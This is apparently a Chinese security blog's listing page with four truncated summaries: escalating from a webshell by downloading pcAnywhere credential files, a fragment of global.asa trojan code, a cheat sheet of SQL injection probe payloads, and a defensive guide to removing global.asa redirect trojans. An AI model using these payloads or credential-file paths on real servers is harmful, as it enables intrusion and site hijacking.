摘要:
网络安全 说到花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ 嘻嘻~~好跟我来,看看有什么可以利用的来提升权限 **************************************************************************** 第一 如果服务器上有装了pcanywhere服务端,管理员为了管理方便 也给了我们方便,到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.c 阅读全文
摘要:
最近流行的global.asa木马代码实例:函数一:用来创建global.asa文件:Public Function createasa(ByVal Content)On Error Resume NextSet fso = Server.CreateObject("scripting.filesystemobject")set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))f.Attributes=0Set Obj = Server.CreateObject(&qu 阅读全文
摘要:
比方说在查询id是50的数据时,如果用户传近来的参数是50 and 1=1,如果没有设置过滤的话,可以直接查出来,SQL 注入一般在ASP程序中遇到最多, 看看下面的 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 4.注入参数是字符 'and [查询条件] and ''=' 阅读全文
摘要:
你的网站被挂马?被劫持了?可能对于一些有杀毒经验的站长来说是小问题,但对于普通人来说简直无法下手,或许说自己网站被挂马也发现不了。,最近有一种木马global.asa被黑客利用,从百度等搜索引擎访问网站的人都会被跳转到其他恶意网站上面.今天就给大家分析下怎么处置这种木马。Global.asa 文件是一个可选的文件,它可包含可被ASP 应用程序中每个页面访问的对象、变量以及方法的声明。所有合法的浏览器脚本都能在Global.asa 中使用。 Global.asa 中,我们可以告知application 和session 对象在启动和结束时做什么事情。完成此项任务的代码被放置在事件操作器中。根 据 阅读全文